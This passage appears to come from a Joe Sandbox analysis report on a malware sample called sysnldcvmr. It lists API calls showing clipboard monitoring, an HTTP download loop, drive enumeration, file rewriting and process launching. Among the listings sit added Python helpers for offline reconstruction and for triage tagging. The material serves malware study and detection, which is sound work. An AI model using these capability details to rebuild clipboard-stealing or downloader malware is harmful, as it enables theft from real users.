                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                    • String ID:
                                                                    • API String ID: 3549449529-0
                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 00405898
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                    • String ID: %x%X$0
                                                                    • API String ID: 716646876-225668902
                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

                                                                    Control-flow Graph (graph image not reproduced; executed/not-executed colouring lost. Entry block 40dbc0-40dc5b calls memset, InternetCrackUrlA and InternetOpenA; the InternetReadFile block at 40dd0e-40dd30 and the memcpy block at 40dd3d-40dd94 form the read loop via 40dd01-40dd08; the function returns at 40ddd7-40dde0 after the three InternetCloseHandle blocks.)
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040DBE8
                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                    • String ID: <$GET
                                                                    • API String ID: 1205665004-427699995
                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                    • API String ID: 1650488544-2117135753
                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
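The block above is a drive-inventory routine: GetLogicalDrives, a lookup of the Explorer NoDrives policy, then per drive GetVolumeInformationW, GetDiskFreeSpaceExW, a 64-bit division by 0x40000000 (bytes to whole GiB) and wsprintfW with the literals "(%dGB)", "%s%s" and "Unnamed volume". The Python below is an added example, not code from the sample, that reproduces that logic offline with constructed inputs. The bit layout of GetLogicalDrives and NoDrives (bit n = drive letter n, A: = bit 0) is standard Windows behaviour; reporting NoDrives-masked drives separately, the concatenation order assumed for "%s%s", and the VOLUMES sample data are this example's assumptions.

```python
r"""Reconstruct the drive inventory implied by the API block above.

Added example for this report, not code from the sample; no Windows API
is called. Inputs stand in for GetLogicalDrives(), the NoDrives policy
DWORD, and the (label, total_bytes) pairs GetVolumeInformationW /
GetDiskFreeSpaceExW would return. Output format order is an assumption.
"""
GIB = 0x40000000  # the _aulldiv divisor in the block above: bytes -> whole GiB


def drive_letters(logical_mask, nodrives_mask=0):
    r"""Decode GetLogicalDrives(): bit n set means drive chr('A'+n) exists.

    HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
    uses the same layout; a set bit hides that drive from Explorer. The sample
    reads both, so both are decoded here. Returns (visible, hidden) root paths.
    """
    visible, hidden = [], []
    for bit in range(26):
        if logical_mask >> bit & 1:
            root = chr(ord("A") + bit) + ":\\"
            (hidden if nodrives_mask >> bit & 1 else visible).append(root)
    return visible, hidden


def describe_volume(root, label, total_bytes):
    """Mimic the wsprintfW calls: label or 'Unnamed volume', then '(%dGB)'.

    _aulldiv(total, 0x40000000) is integer division, so 2 GiB + 1 byte is '2GB'.
    Joining root + label for the sample's "%s%s" is an assumption.
    """
    name = label if label else "Unnamed volume"
    return "%s%s" % (root, name) + "(%dGB)" % (total_bytes // GIB)


def inventory(logical_mask, nodrives_mask, volumes):
    """One description line per visible drive; NoDrives-masked drives are
    returned separately so an analyst can see what the policy would hide.
    Drives missing from `volumes` (e.g. an empty A:) fall back to no label, 0 bytes,
    which is what the sample's 'Unnamed volume' branch suggests happens on failure."""
    visible, hidden = drive_letters(logical_mask, nodrives_mask)
    lines = [describe_volume(r, *volumes.get(r, ("", 0))) for r in visible]
    return lines, hidden


# Constructed sample: A:, C:, D: present (bits 0, 2, 3); the policy hides D:.
SAMPLE_MASK = 0b1101
SAMPLE_NODRIVES = 0b1000
VOLUMES = {
    "C:\\": ("", 476 * GIB + 12345),   # unlabeled system volume
    "D:\\": ("Data", 2 * GIB),         # labeled data volume
}

if __name__ == "__main__":
    lines, hidden = inventory(SAMPLE_MASK, SAMPLE_NODRIVES, VOLUMES)
    print("\n".join(lines))
    print("hidden by NoDrives:", hidden)
```

Running it prints the two visible drives in the sample's "(%dGB)" style and lists D: as policy-hidden; when matching the real output against C2 traffic, remember that the GiB value is truncated, not rounded.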

                                                                    Control-flow Graph (graph image not reproduced; executed/not-executed colouring lost. Entry block 40e7c0-40e7ff calls CreateFileW; the existing file is mapped and compared in the memcmp block at 40e8bc-40e8e7, then conditionally rewritten through the CreateFileW block at 40e920-40e940 and the WriteFile block at 40e942-40e961; the function returns at 40e974-40e97a.)
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                    • String ID: .Mw
                                                                    • API String ID: 3902698870-2453323595
                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                    • String ID: Vz@$.Mw
                                                                    • API String ID: 439099756-60430008
                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
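The function blocks on this page (the clipboard-viewer window procedure, the message-loop thread, the WinINet GET/POST client, and the file-mapping routines above) are raw call listings; a practitioner reading several such reports usually wants them collapsed into behaviour tags. The Python below is an added triage helper, not Joe Sandbox or sample code: it parses listings in exactly the format shown here ("• Func.MODULE(args), ref: ADDR", with indented "Part of subcall function" lines for callees) and maps each function's API set to a capability tag. The RULES table, the tag names, and SAMPLE_LISTING (assembled from lines copied off this page) are constructed for the example; the clipboard-format constants are the standard winuser.h values.

```python
"""Tag Joe Sandbox-style API listings with behaviour capabilities.

Added triage helper for this report, not Joe Sandbox or sample code.
parse_blocks() splits the "APIs" sections shown above into per-function
call lists; classify() maps each function's API set to constructed tags.
RULES, tag names and SAMPLE_LISTING are this example's own constructions.
"""
import re

API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)

# Constructed rules: every API in a set must be reachable from the function
# (directly or via a "Part of subcall" callee) for the tag to apply.
RULES = {
    "clipboard_monitor": {"SetClipboardViewer", "GetClipboardData", "ChangeClipboardChain"},
    "raw_input_capture": {"RegisterRawInputDevices"},
    "window_message_loop": {"RegisterClassExW", "CreateWindowExW", "GetMessageA", "DispatchMessageA"},
    "wininet_http_client": {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                            "HttpSendRequestA", "InternetReadFile"},
    "drive_enumeration": {"GetLogicalDrives", "GetVolumeInformationW", "GetDiskFreeSpaceExW"},
    "file_mapping_read": {"CreateFileMappingW", "MapViewOfFile"},
    "process_launch": {"CreateProcessW", "ShellExecuteW"},
}
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}  # winuser.h
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_blocks(text):
    """One list of call dicts per 'APIs' section; metadata sections are skipped."""
    blocks, current, in_apis = [], None, False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current, in_apis = [], True
            blocks.append(current)
            continue
        if stripped in SECTION_HEADERS:
            in_apis = False  # bullets here are dump/hash metadata, not calls
            continue
        m = API_LINE.match(line) if in_apis else None
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            current.append({"func": m["func"], "module": m["module"], "args": args,
                            "ref": m["ref"], "subcall": m["sub"] is not None})
    return blocks


def classify(calls):
    """Tags plus argument-derived details for one function's calls."""
    funcs = {c["func"] for c in calls}
    tags = sorted(tag for tag, required in RULES.items() if required <= funcs)
    details = {}
    for c in calls:
        if c["func"] == "HttpOpenRequestA" and len(c["args"]) > 1:
            details["http_method"] = c["args"][1]  # lpszVerb is the 2nd argument
        if c["func"] == "IsClipboardFormatAvailable" and c["args"]:
            fmt = int(c["args"][0], 16)
            details["clipboard_format"] = CLIPBOARD_FORMATS.get(fmt, hex(fmt))
    refs = [c["ref"] for c in calls if c["ref"] and not c["subcall"]]
    return {"first_ref": min(refs) if refs else None, "api_count": len(funcs),
            "tags": tags, "details": details}


def triage(text):
    return [classify(block) for block in parse_blocks(text)]


SAMPLE_LISTING = """\
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 0040597C
• SetClipboardViewer.USER32(?), ref: 004059C8
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
• GetClipboardData.USER32(00000000), ref: 00405A89
• RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
• ChangeClipboardChain.USER32(?,?), ref: 00405B9E
Memory Dump Source
• Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
APIs
• RegisterClassExW.USER32(00000030), ref: 004058F3
• CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
• DispatchMessageA.USER32(?), ref: 0040594F
Strings
APIs
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
• HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
APIs
• InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
• CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
  • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
"""

if __name__ == "__main__":
    for r in triage(SAMPLE_LISTING):
        print(r["first_ref"], r["tags"], r["details"])
```

Feed it the text of a whole report and it yields one record per function: the clipboard procedure above comes out tagged clipboard_monitor and raw_input_capture with the format resolved to CF_UNICODETEXT, and the WinINet routine records the GET verb taken from HttpOpenRequestA's second argument. Tags are deliberately conservative (all APIs in a rule must be present), so a function that only calls RegisterRawInputDevices is flagged for review rather than declared a keylogger.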
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E98E
                                                                    • memset.NTDLL ref: 0040E99E
                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                    • String ID: $D$Gy@$open
                                                                    • API String ID: 3787208655-4184347819
                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 3862671961-0
                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                    • String ID: .Mw
                                                                    • API String ID: 3956458805-2453323595
                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 1457358591-2453323595
                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
